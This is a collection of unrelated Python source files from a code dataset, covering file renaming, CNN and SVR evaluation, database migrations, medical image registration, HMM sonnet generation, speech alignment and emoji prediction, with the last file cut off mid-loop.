DeleteFiles:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Si fichier à supprimer\n\t\t\t\ttry:\n\t\t\t\t\tprint (\"Delete --> \"+ os.path.join(root, filename))\n\t\t\t\t\tos.remove(os.path.join(root, filename))\n\t\t\t\texcept OSError:\n\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t# print(filename)\n\t\t\t\ttry:\n\t\t\t\t\t# NewName = remove_accents(filename)\n\t\t\t\t\tNewName = Change_Words(remove_accents(filename))\n\t\t\t\t\tif filename != NewName:\n\t\t\t\t\t\tNameSrc = os.path.join(root, filename)\n\t\t\t\t\t\tNameDest = os.path.join(root, NewName)\n\t\t\t\t\t\tprint (\"old=\", NameSrc)\n\t\t\t\t\t\tprint (\"New=\", NameDest)\n\t\t\t\t\t\tos.rename(NameSrc, NameDest)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\nCurrentPath = os.path.dirname(sys.argv[0])\t\t\t\t\t\t# Current Path\nWordsFile = \"/ChangeWords.txt\"\t\t\t\t\t\t\t\t\t\t\t\t# mots à remplacer\nDeleteFile = \"/DeleteFiles.txt\"\t\t\t\t\t\t\t\t\t\t\t\t# Fichiers à supprimer\n\nif os.path.isfile(CurrentPath + WordsFile): \t\t\t\t\t# Si fichier présent\n\tRChgWords(CurrentPath, WordsFile)\t\t\t\t\t\t\t\t\t\t# chargement...\nelse:\n\tprint (\"\\nFichier \" + WordsFile + \" non trouvé !\\n\\nArrêt !!\\n\")\n\tsys.exit(1)\n\nif os.path.isfile(CurrentPath + DeleteFile): \t\t\t\t\t# Si fichier présent\n\tRDelFiles(CurrentPath, DeleteFile)\t\t\t\t\t\t\t\t\t# chargement...\nelse:\n\tprint (\"\\nFichier \" + DeleteFile + \" non trouvé !\\n\\nArrêt !!\\n\")\t\n\tsys.exit(1)\n\n\t\nStrPath = sys.argv[1]\nif os.path.exists(StrPath):\n\treadPath(StrPath)\n\t\n","sub_path":"rname.01.py","file_name":"rname.01.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64959327","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nClassify all the test dataset through our CNN to get accuracy.\n\"\"\"\nimport numpy as np\nimport operator\nimport random\nimport glob\nimport argparse\nimport os.path\nfrom data import DataSet\nfrom processor import process_image\nfrom tensorflow.keras.models import load_model\n#from tensorflow.contrib.lite.python import interpreter as interpreter_wrapper\nfrom tensorflow.lite.python import interpreter as interpreter_wrapper\nfrom tensorflow.keras.preprocessing import image\n\nimport tensorflow as 
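# The French comments in rname.01.py above read roughly: "Ouverture de" =
# "opening of", "mots à remplacer" = "words to replace", "Fichiers à
# supprimer" = "files to delete", "Si fichier présent" = "if the file exists".
# A self-contained sketch of the NFKD technique its remove_accents() relies
# on: decompose, then drop the combining marks.
import unicodedata

def strip_accents(s):
    nfkd = unicodedata.normalize('NFKD', s)
    return ''.join(c for c in nfkd if not unicodedata.combining(c))

assert strip_accents('Déjà vu au café') == 'Deja vu au cafe'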
tf\nimport tensorflow.keras.backend as KTF\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True #dynamic alloc GPU resource\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.3 #GPU memory threshold 0.3\nsession = tf.Session(config=config)\n\n# set session\nKTF.set_session(session)\n\n\ndef predict(saved_model, image_file):\n interpreter = interpreter_wrapper.Interpreter(model_path=saved_model)\n interpreter.allocate_tensors()\n\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n\n # NxHxWxC, H:1, W:2\n height = input_details[0]['shape'][1]\n width = input_details[0]['shape'][2]\n\n\n img = image.load_img(image_file, target_size=(height, width))\n img = image.img_to_array(img)\n\n # check the type of the input tensor\n if input_details[0]['dtype'] == np.float32:\n #img = preprocess_input(img)\n img = img / 255.\n #img = img/127.5 - 1\n elif input_details[0]['dtype'] == np.uint8:\n img = img.astype(np.uint8)\n\n input_data = np.expand_dims(img, axis=0)\n\n # Predict!\n interpreter.set_tensor(input_details[0]['index'], input_data)\n interpreter.invoke()\n\n output_data = interpreter.get_tensor(output_details[0]['index'])\n return output_data\n\n\n\ndef validate_cnn_model(model_file):\n data = DataSet()\n #model = load_model(model_file)\n\n # Get all our test images.\n images = glob.glob(os.path.join('data', 'test_full', '**', '*.jpg'))\n\n # Count the correct predict\n result_count = 0\n\n for image in images:\n print('-'*80)\n # Get a random row.\n #sample = random.randint(0, len(images) - 1)\n #image = images[sample]\n\n # Get groundtruth class string\n class_str = image.split(os.path.sep)[-2]\n\n # Turn the image into an array.\n print(image)\n #image_arr = process_image(image, (224, 224, 3))\n #image_arr = np.expand_dims(image_arr, axis=0)\n\n # Predict.\n predictions = predict(model_file, image)\n\n # Show how much we think it's each one.\n label_predictions = {}\n for i, label in enumerate(data.classes):\n label_predictions[label] = predictions[0][i]\n\n sorted_lps = sorted(label_predictions.items(), key=operator.itemgetter(1), reverse=True)\n\n # Get top-1 predict class as result\n predict_class_str = sorted_lps[0][0]\n if predict_class_str == class_str:\n result_count = result_count + 1\n\n for i, class_prediction in enumerate(sorted_lps):\n # Just get the top five.\n if i > 4:\n break\n print(\"%s: %.2f\" % (class_prediction[0], class_prediction[1]))\n i += 1\n\n print(\"\\nval_acc: %f\" % (result_count/float(len(images))))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_file', help='model file to predict', type=str)\n\n args = parser.parse_args()\n if not args.model_file:\n raise ValueError('model file is not specified')\n\n validate_cnn_model(args.model_file)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"validate_cnn_tflite.py","file_name":"validate_cnn_tflite.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"136869343","text":"import csv\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.svm import SVR, NuSVR\nfrom sklearn.neighbors import KNeighborsRegressor as KNNR\n\ndef get_RMSE(y, y_predict):\n return ((y-y_predict)**2).mean()\n\ndef run_SVR(filename,svr_model):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n csv_input = list(reader)\n csv_input.pop(0)\n x_matrix = []\n y_matrix = []\n for i in range(len(csv_input)):\n row=[ float(x) 
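# A minimal sketch of the dtype-aware preprocessing that predict() in the
# validate_cnn_tflite.py record above applies before invoking the TFLite
# interpreter: float models expect scaled inputs, fully-quantized models take
# raw uint8 (numpy only here; no TFLite dependency).
import numpy as np

def prepare_input(img, input_dtype):
    if input_dtype == np.float32:
        return (img / 255.0).astype(np.float32)  # scale to [0, 1]
    if input_dtype == np.uint8:
        return img.astype(np.uint8)              # quantized model: no scaling
    raise ValueError('unsupported input dtype: {!r}'.format(input_dtype))

raw = np.random.randint(0, 256, size=(224, 224, 3))
assert float(prepare_input(raw, np.float32).max()) <= 1.0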
for x in csv_input[i]]\n            x_matrix.append(row[0:-1])\n            y_matrix.append(row[-1])\n\n    x = np.array(x_matrix)\n    y = np.array(y_matrix)\n    random_permutation_index = np.random.permutation(x.shape[0])\n    x = x[random_permutation_index]\n    y = y[random_permutation_index]\n\n    train_x = x[:-100]\n    train_y = y[:-100]\n    test_x = x[-100:]\n    test_y = y[-100:]\n    model = svr_model.fit(train_x, train_y)\n    y_train_result = model.predict(train_x)\n    print('training RMSE = {}'.format(get_RMSE(train_y,y_train_result)))\n    y_predict_result = model.predict(test_x)\n    print('test RMSE = {}'.format(get_RMSE(test_y,y_predict_result)))\n    print()\n    return test_y, y_predict_result\n\nsvr_model = SVR(C=1)\nwith open('prediction1.csv', 'w', newline='') as csvfile:\n    writer = csv.writer(csvfile)\n    y_truth, y_predict = run_SVR('input_2007_w5.csv', svr_model)\n    for i in range(len(y_truth)):\n        writer.writerow([y_truth[i] ,y_predict[i]])\n\nsvr_model = NuSVR(C=100)\nwith open('prediction2.csv', 'w', newline='') as csvfile:\n    writer = csv.writer(csvfile)\n    y_truth, y_predict = run_SVR('input_2007.csv', svr_model)\n    for i in range(len(y_truth)):\n        writer.writerow([y_truth[i] ,y_predict[i]])\n\n\n\n\n\n","sub_path":"dynamodb_interface/ML/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197584249","text":"import sys\r\naddresses = {}\r\nfp = open('ip-base.txt')\r\nwith fp as f:\r\n    for line in f:\r\n        addresses.update({line.split(\" \")[0]:line.split(\" \")[1]})\r\n\r\nfor key in addresses:\r\n    print(key, addresses[key])\r\n\r\nfp.close()\r\n\r\nn = input(\"Enter 1 if you want to search an ip or 2 if you want to search a domain: \")\r\n\r\nip =\"\"\r\ndomain=\"\"\r\nout=\"\"\r\n\r\nif n=='1':\r\n    ip = input(\"Enter an ip:\")\r\n    out=addresses.get(ip,\"\")\r\n    if out!=\"\":\r\n        print(\"Domain name is: \" +out)\r\n    else:\r\n        sys.exit(\"Domain not found!\")\r\nelif n=='2':\r\n    domain = input(\"Enter a domain: \")+\"\\n\"\r\n    found = False\r\n    for key in addresses:\r\n        if domain == addresses[key]:\r\n            print(\"IP address is: \"+key)\r\n            found = True\r\n    if not found:\r\n        sys.exit(\"IP not found!\")\r\n\r\nelse:\r\n    sys.exit(\"Wrong input!\")","sub_path":"practice_1/ip_resolver_search.py","file_name":"ip_resolver_search.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99216125","text":"from common import TreeNode\n\nclass Solution(object):\n    def findBottomLeftValue(self, root):\n        row = [root]\n        last_row = []\n        \n        while len(row) > 0:\n            new_row = []\n            for node in row:\n                if (node.left):\n                    new_row.append(node.left)\n                if (node.right):\n                    new_row.append(node.right)\n            last_row = row\n            row = new_row\n        \n        return last_row[0].val\n","sub_path":"LeetCode/p513.py","file_name":"p513.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"133332385","text":"#!/usr/bin/python3\n''' Define the Square class.\n\n    Attributes:\n        Square -- class representing a Square\n'''\n\n\nclass Square():\n    ''' Represent a square. 
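# Note on the output.py record above: get_RMSE() returns the mean of squared
# errors without taking a square root, so the values it prints are MSE, not
# RMSE. The conventional definition, for comparison:
import numpy as np

def rmse(y, y_pred):
    return np.sqrt(((y - y_pred) ** 2).mean())

assert rmse(np.array([1.0, 2.0]), np.array([1.0, 4.0])) == np.sqrt(2.0)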
'''\n def __init__(self, size=0):\n ''' Initialize an instance of a square.\n\n Args:\n size -- Length of square's sides.\n\n Exceptions:\n -- Raise TypeError if size is not an int\n -- Raise ValueError if size is negative\n '''\n if type(size) is not int:\n raise TypeError('size must be an integer')\n elif size < 0:\n raise ValueError('size must be >= 0')\n else:\n self._Square__size = size\n","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426507718","text":"\"\"\"initial migration\n\nRevision ID: daea515a48ac\nRevises: \nCreate Date: 2020-12-16 13:36:41.978746\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'daea515a48ac'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('inbox',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('outbox',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('roles',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('sender_id', sa.Integer(), nullable=True),\n sa.Column('recipient_id', sa.Integer(), nullable=True),\n sa.Column('read_yn', sa.Boolean(), nullable=True),\n sa.Column('sender_deleted', sa.Boolean(), nullable=True),\n sa.Column('reciever_deleted', sa.Boolean(), nullable=True),\n sa.Column('date', sa.DateTime(), nullable=True),\n sa.Column('title', sa.String(length=100), nullable=True),\n sa.Column('message', sa.String(length=500), nullable=True),\n sa.ForeignKeyConstraint(['recipient_id'], ['inbox.id'], ),\n sa.ForeignKeyConstraint(['sender_id'], ['outbox.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('role_id', sa.Integer(), nullable=True),\n sa.Column('date_joined', sa.Date(), nullable=True),\n sa.Column('inbox_id', sa.Integer(), nullable=True),\n sa.Column('outbox_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['inbox_id'], ['inbox.id'], ),\n sa.ForeignKeyConstraint(['outbox_id'], ['outbox.id'], ),\n sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_username'), 'users', ['username'], unique=True)\n op.create_table('posts',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('poster_id', sa.Integer(), nullable=True),\n sa.Column('title', sa.String(length=100), nullable=True),\n sa.Column('description', sa.String(length=500), nullable=True),\n sa.Column('budget', sa.String(length=10), nullable=True),\n sa.Column('hourlypay', sa.String(length=10), nullable=True),\n sa.ForeignKeyConstraint(['poster_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
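# The Square class above writes self._Square__size directly; inside the class
# body that is exactly what the idiomatic self.__size mangles to, so the two
# spellings store the same attribute. A self-contained demonstration:
class Demo:
    def __init__(self, size):
        self.__size = size        # stored on the instance as _Demo__size

d = Demo(3)
assert d._Demo__size == 3         # same attribute, reached via its mangled name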
###\n op.drop_table('posts')\n op.drop_index(op.f('ix_users_username'), table_name='users')\n op.drop_table('users')\n op.drop_table('messages')\n op.drop_table('roles')\n op.drop_table('outbox')\n op.drop_table('inbox')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/daea515a48ac_initial_migration.py","file_name":"daea515a48ac_initial_migration.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102026168","text":"# Register all training volumes to 0007.nii.gz. No resizing in this version\n\nimport ants\nimport os\n\n# Constants for path names\nFIXED_IMG = \"/content/drive/My Drive/cs8395_deep_learning/assignment3/data/Train/img/0007.nii.gz\"\nOLD_TEST_IMG = \"/content/drive/My Drive/cs8395_deep_learning/assignment3/data/Testing/img/\"\nNEW_TEST_IMG = \"/content/drive/My Drive/cs8395_deep_learning/assignment3/data/Testing/img_registered_rigid/\"\n\n# Load in fixed image\nfixed = ants.image_read(FIXED_IMG)\n\n# Register all the testing images\nfor file_name in os.listdir(OLD_TEST_IMG):\n # Load in moving image\n moving_image = ants.image_read(OLD_TEST_IMG + file_name)\n print(\"Registering \", file_name)\n # Perform registration\n transform = ants.registration(fixed=fixed , moving=moving_image,\n type_of_transform='QuickRigid', random_seed=0)\n transformed_image = ants.apply_transforms( fixed=fixed, moving=moving_image,\n transformlist=transform['fwdtransforms'],\n interpolator='nearestNeighbor')\n # Save transformed image\n print(\"Saving \", file_name)\n transformed_image.to_file(NEW_TEST_IMG + file_name)","sub_path":"homework/assignment3/bin/test_preprocessing/register_rigid.py","file_name":"register_rigid.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"322104208","text":"from HMM import unsupervised_HMM\nfrom preprocessing import processed_shakespeare_data\nfrom preprocessing import processed_shakespeare_data2\nimport random\nfrom preprocessing import punctuation_freq_shakespeare\n\ndef ten_syllables_rhyme_generator(n_states, N_iters, k, train_on='line'):\n '''\n Trains an HMM using unsupervised learning and generates k 14-line sonnets.\n\n Arguments:\n k: Number of sonnets to generate.\n n_states: Number of hidden states that the HMM should have.\n N_iters: Number of iterations for the unsupervised learning\n (EM algorithm)\n train_on: Optional argument. 
Train on either line or sonnet.\n Default to line.\n '''\n # Data to train on from pre-processing.\n data, words_list, syllables, end_syllables, rhyme_dict, stress_dict = \\\n processed_shakespeare_data2()\n\n # If train on sonnet instead of line.\n if train_on == 'sonnet':\n data, words_list, syllables, end_syllables = \\\n processed_shakespeare_data()\n\n print('Training unsupervised HMM...')\n\n f = open('output/10_syllables_rhyme.txt', 'a+')\n\n print('(%d states, %d iterations, training on each %s)\\n\\n' % \\\n (n_states, N_iters, train_on))\n f.write('(%d states, %d iterations, training on each %s)\\n\\n\\n' % \\\n (n_states, N_iters, train_on))\n\n # Train the HMM.\n HMM = unsupervised_HMM(data, n_states, N_iters)\n\n # Generate k input sequences.\n for i in range(k):\n\n # Generate a 14-line sonnet\n sonnet_lines = HMM.generate_sonnet_rhyme(words_list, syllables, \\\n end_syllables, rhyme_dict)\n punct_marks, punct_freq = punctuation_freq_shakespeare()\n\n print('\\n\\nSonnet # ' + str(i + 1))\n\n # Print the results.\n for s, emission in enumerate(sonnet_lines):\n if s == 13:\n # Last line of sonnet ends with period.\n line = ' '.join([words_list[j] for j in emission])+ '.'\n line = line[0].upper() + line[1:]\n print(line)\n f.write(line)\n else:\n line = ' '.join([words_list[j] for j in emission]) + \\\n random.choices(punct_marks, weights=punct_freq)[0]\n line = line[0].upper() + line[1:]\n # Add some punctuation to the end of every sentence\n print(line)\n f.write(line)\n f.write('\\n')\n f.write('\\n\\n')\n\n f.close()\n\n print('')\n print('')\n\nif __name__ == '__main__':\n print('')\n print('')\n print(\"#\" * 70)\n print(\"{:^70}\".format(\"Generating Rhyming Sonnets with 10-Syllable Lines\"))\n print(\"#\" * 70)\n print('')\n print('')\n\n n_states = 100\n N_iters = 20\n k = 3\n\n ten_syllables_rhyme_generator(n_states, N_iters, k, train_on='line')\n","sub_path":"10_syllables_rhyme.py","file_name":"10_syllables_rhyme.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414855481","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('news', '0003_news_date'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='news',\n options={'get_latest_by': 'date', 'verbose_name_plural': 'News'},\n ),\n migrations.AlterField(\n model_name='news',\n name='date',\n field=models.DateField(default=datetime.datetime(2014, 10, 22, 18, 32, 29, 552167)),\n ),\n ]\n","sub_path":"news/migrations/0004_auto_20141022_1832.py","file_name":"0004_auto_20141022_1832.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"160840194","text":"import os\nimport shutil\nfrom tqdm import tqdm\nimport time\n\nfrom .base import BaseAligner, TEMP_DIR, TriphoneFmllrConfig, TriphoneConfig\n\nfrom ..dictionary import Dictionary\n\nfrom ..multiprocessing import (align, calc_fmllr, make_path_safe,thirdparty_binary, subprocess,convert_ali_to_textgrids)\n\nclass PretrainedAligner(BaseAligner):\n '''\n Class for aligning a dataset using a pretrained acoustic model\n\n Parameters\n ----------\n archive : :class:`~aligner.archive.Archive`\n Archive containing the acoustic model and pronunciation dictionary\n corpus : :class:`~aligner.corpus.Corpus`\n Corpus object for the 
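# Sketch of the weighted draw used for end-of-line punctuation in the sonnet
# generator above; random.choices (Python 3.6+) normalizes the weights, so
# they do not need to sum to 1. The example frequencies are illustrative.
import random

marks, freqs = [',', '.', ';', '!'], [50, 30, 15, 5]
mark = random.choices(marks, weights=freqs)[0]   # one weighted sample
assert mark in marks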
dataset\n output_directory : str\n Path to directory to save TextGrids\n temp_directory : str, optional\n Specifies the temporary directory root to save files need for Kaldi.\n If not specified, it will be set to ``~/Documents/MFA``\n num_jobs : int, optional\n Number of processes to use, defaults to 3\n call_back : callable, optional\n Specifies a call back function for alignment\n '''\n def __init__(self, archive, corpus, output_directory,\n temp_directory = None, num_jobs = 3, speaker_independent = False,\n call_back = None):\n\n if temp_directory is None:\n temp_directory = TEMP_DIR\n self.temp_directory = temp_directory\n self.output_directory = output_directory\n self.corpus = corpus\n self.speaker_independent = speaker_independent\n self.dictionary = Dictionary(archive.dictionary_path, os.path.join(temp_directory, 'dictionary'), word_set=corpus.word_set)\n\n self.dictionary.write()\n archive.export_triphone_model(self.tri_directory)\n\n if self.corpus.num_jobs != num_jobs:\n num_jobs = self.corpus.num_jobs\n self.num_jobs = num_jobs\n self.call_back = call_back\n if self.call_back is None:\n self.call_back = print\n self.verbose = False\n self.tri_fmllr_config = TriphoneFmllrConfig(**{'realign_iters': [1, 2],\n 'fmllr_iters': [1],\n 'num_iters': 3,\n #'boost_silence': 0\n })\n self.tri_config = TriphoneConfig()\n\n def do_align(self):\n '''\n Perform alignment while calculating speaker transforms (fMLLR estimation)\n '''\n self._init_tri()\n if not self.speaker_independent:\n self.train_tri_fmllr()\n\n def _align_fmllr(self):\n '''\n Align the dataset using speaker-adapted transforms\n '''\n model_directory = self.tri_directory\n output_directory = self.tri_ali_directory\n self._align_si(fmllr = False)\n sil_phones = self.dictionary.silence_csl\n\n log_dir = os.path.join(output_directory, 'log')\n os.makedirs(log_dir, exist_ok = True)\n if not self.speaker_independent:\n calc_fmllr(output_directory, self.corpus.split_directory,\n sil_phones, self.num_jobs, self.tri_fmllr_config, initial = True)\n optional_silence = self.dictionary.optional_silence_csl\n align(0, output_directory, self.corpus.split_directory,\n optional_silence, self.num_jobs, self.tri_fmllr_config)\n\n def _init_tri(self):\n if not os.path.exists(self.tri_ali_directory):\n self._align_fmllr()\n if self.speaker_independent:\n return\n os.makedirs(os.path.join(self.tri_fmllr_directory, 'log'), exist_ok = True)\n begin = time.time()\n self.corpus.setup_splits(self.dictionary)\n shutil.copy(os.path.join(self.tri_directory,'final.mdl'),\n os.path.join(self.tri_fmllr_directory,'1.mdl'))\n for i in range(self.num_jobs):\n shutil.copy(os.path.join(self.tri_ali_directory, 'fsts.{}'.format(i)),\n os.path.join(self.tri_fmllr_directory, 'fsts.{}'.format(i)))\n shutil.copy(os.path.join(self.tri_ali_directory, 'trans.{}'.format(i)),\n os.path.join(self.tri_fmllr_directory, 'trans.{}'.format(i)))\n\n def train_tri_fmllr(self):\n directory = self.tri_fmllr_directory\n sil_phones = self.dictionary.silence_csl\n if self.call_back == print:\n iters = tqdm(range(1, self.tri_fmllr_config.num_iters))\n else:\n iters = range(1, self.tri_fmllr_config.num_iters)\n log_directory = os.path.join(directory, 'log')\n for i in iters:\n model_path = os.path.join(directory,'{}.mdl'.format(i))\n occs_path = os.path.join(directory, '{}.occs'.format(i+1))\n next_model_path = os.path.join(directory,'{}.mdl'.format(i+1))\n if os.path.exists(next_model_path):\n continue\n align(i, directory, self.corpus.split_directory,\n 
self.dictionary.optional_silence_csl,\n self.num_jobs, self.tri_fmllr_config)\n calc_fmllr(directory, self.corpus.split_directory, sil_phones,\n self.num_jobs, self.tri_fmllr_config, initial = False, iteration = i)\n os.rename(model_path, next_model_path)\n self.parse_log_directory(log_directory, i)\n os.rename(next_model_path, os.path.join(directory,'final.mdl'))\n\n def export_textgrids(self):\n '''\n Export a TextGrid file for every sound file in the dataset\n '''\n if self.speaker_independent:\n model_directory = self.tri_ali_directory\n else:\n model_directory = self.tri_fmllr_directory\n convert_ali_to_textgrids(self.output_directory, model_directory, self.dictionary,\n self.corpus, self.num_jobs)\n","sub_path":"aligner/aligner/pretrained.py","file_name":"pretrained.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455897944","text":"import random\n\nmyslovar={\n'vesh':['йо', 'камон', 'бичез'],\n'animals':['кошка','собака','какаду']\n}\nmyzadachi={\n'first':'нарисуй {animals}',\n'second':'нарисуй {animals} с ногой',\n'third':'нарисуй {animals} с ногой в кепке'\n}\ndef newslovar(slovar,zadachi):\n\n superslovar={}\n for zadacha in zadachi:\n print (zadacha)\n print (zadachi[zadacha])\n fratha=zadachi[zadacha]\n for slovo in slovar:\n print(slovo)\n if '{'+slovo+'}' in fratha:\n print('слово подошло')\n gener=slovar[slovo][random.randint(0,2)]\n otvet=fratha.format(**{slovo:gener})\n break\n else:\n print('не подощло')\n otvet='poshel nah'\n superslovar[zadacha]=otvet\n return superslovar\n\notvetik=newslovar(myslovar,myzadachi)\nprint(otvetik)\n","sub_path":"shablon.py","file_name":"shablon.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47893702","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Use torchMoji to predict emojis from a single text input\n\"\"\"\n\nfrom __future__ import print_function, division, unicode_literals\nimport example_helper\nimport json\nimport csv\nimport argparse\nimport unidecode\n\nimport numpy as np\nimport emoji\n\nfrom torchmoji.sentence_tokenizer import SentenceTokenizer\nfrom torchmoji.model_def import torchmoji_emojis\nfrom torchmoji.global_variables import PRETRAINED_PATH, VOCAB_PATH\n\n# Emoji map in emoji_overview.png\nEMOJIS = \":joy: :unamused: :weary: :sob: :heart_eyes: \\\n:pensive: :ok_hand: :blush: :heart: :smirk: \\\n:grin: :notes: :flushed: :100: :sleeping: \\\n:relieved: :relaxed: :raised_hands: :two_hearts: :expressionless: \\\n:sweat_smile: :pray: :confused: :kissing_heart: :heartbeat: \\\n:neutral_face: :information_desk_person: :disappointed: :see_no_evil: :tired_face: \\\n:v: :sunglasses: :rage: :thumbsup: :cry: \\\n:sleepy: :yum: :triumph: :hand: :mask: \\\n:clap: :eyes: :gun: :persevere: :smiling_imp: \\\n:sweat: :broken_heart: :yellow_heart: :musical_note: :speak_no_evil: \\\n:wink: :skull: :confounded: :smile: :stuck_out_tongue_winking_eye: \\\n:angry: :no_good: :muscle: :facepunch: :purple_heart: \\\n:sparkling_heart: :blue_heart: :grimacing: :sparkles:\".split(' ')\n\n'''\n# Finer gradient emotions\nEMOTIONS = \"funny unamused frustrated sad delight \\\npensive :ok_hand happy love :smirk \\\nexcited :notes surprise :100 tired \\\nhappy very_happy :raised_hands supportive annoyance \\\nembarassed request unhappy happy :heartbeat \\\n:neutral_face :information_desk_person disappointed :see_no_evil :tired_face \\\n:v :sunglasses rage 
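# The Russian strings in shablon.py above read roughly: 'нарисуй {animals}' =
# 'draw a {animals}', 'слово подошло' = 'the word matched', 'не подощло' =
# 'did not match'. Its key trick is filling a template whose placeholder name
# is only known at runtime, via fratha.format(**{slovo: gener}). A minimal
# sketch (random.choice also avoids its hard-coded randint(0, 2) index):
import random

templates = {'first': 'draw a {animal}'}
words = {'animal': ['cat', 'dog', 'cockatoo']}

key = 'animal'
filled = templates['first'].format(**{key: random.choice(words[key])})
assert filled in ('draw a cat', 'draw a dog', 'draw a cockatoo')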
:thumbsup :cry \\\n:sleepy :yum :triumph :hand :mask \\\n:clap :eyes :gun :persevere :smiling_imp \\\n:sweat :broken_heart :yellow_heart :musical_note :speak_no_evil \\\n:wink :skull :confounded smile stuck_out_tongue_winking_eye \\\nangry no_good muscle facepunch purple_heart \\\nsparkling_heart blue_heart grimacing sparkles\".split(' ')\n'''\n\nEMOTIONS = \"positive negative negative negative positive \\\nnegative positive positive positive positive \\\nexcited positive surprise positive negative \\\npositive positive negative positive negative \\\nnegative positive negative positive positive \\\nnegative positive negative positive negative \\\nnegative positive negative positive negative \\\nnegative positive negative negative negative \\\n:clap :eyes :gun :persevere :smiling_imp \\\n:sweat :broken_heart :yellow_heart :musical_note :speak_no_evil \\\n:wink :skull :confounded smile stuck_out_tongue_winking_eye \\\nangry no_good muscle facepunch purple_heart \\\nsparkling_heart blue_heart grimacing sparkles\".split(' ')\n\ndef top_elements(array, k):\n ind = np.argpartition(array, -k)[-k:]\n return ind[np.argsort(array[ind])][::-1]\n\nif __name__ == \"__main__\":\n # argparser = argparse.ArgumentParser()\n # argparser.add_argument('--text', type=str, required=True, help=\"Input text to emojize\")\n # argparser.add_argument('--maxlen', type=int, default=30, help=\"Max length of input text\")\n # args = argparser.parse_args()\n\n OUTPUT_PATH = 'test_sentences.csv'\n\n with open('preprocessed-twitter-tweets/processedNeutral.csv', 'r') as f:\n reader = csv.reader(f)\n test_sentences = list(reader)\n\n for sentence in test_sentences[0]:\n if len(sentence) == 0:\n sentence = 'i'\n\n print(f'test_sentences length: {len(test_sentences[0])}')\n\n # Tokenizing using dictionary\n with open(VOCAB_PATH, 'r') as f:\n vocabulary = json.load(f)\n\n #st = SentenceTokenizer(vocabulary, args.maxlen)\n st = SentenceTokenizer(vocabulary, 500)\n\n # Loading model\n model = torchmoji_emojis(PRETRAINED_PATH)\n # Running predictions\n # Determines the important words in the sentence\n #tokenized, _, _ = st.tokenize_sentences([args.text])\n tokenized, _, _ = st.tokenize_sentences(test_sentences[0])\n #print(f'tokenized words: {tokenized}')\n # Get sentence probability\n #prob = model(tokenized)[0]\n print(f'tokenized: {tokenized}')\n prob = model(tokenized)\n\n for prob in [prob]:\n # Find top emojis for each sentence. 
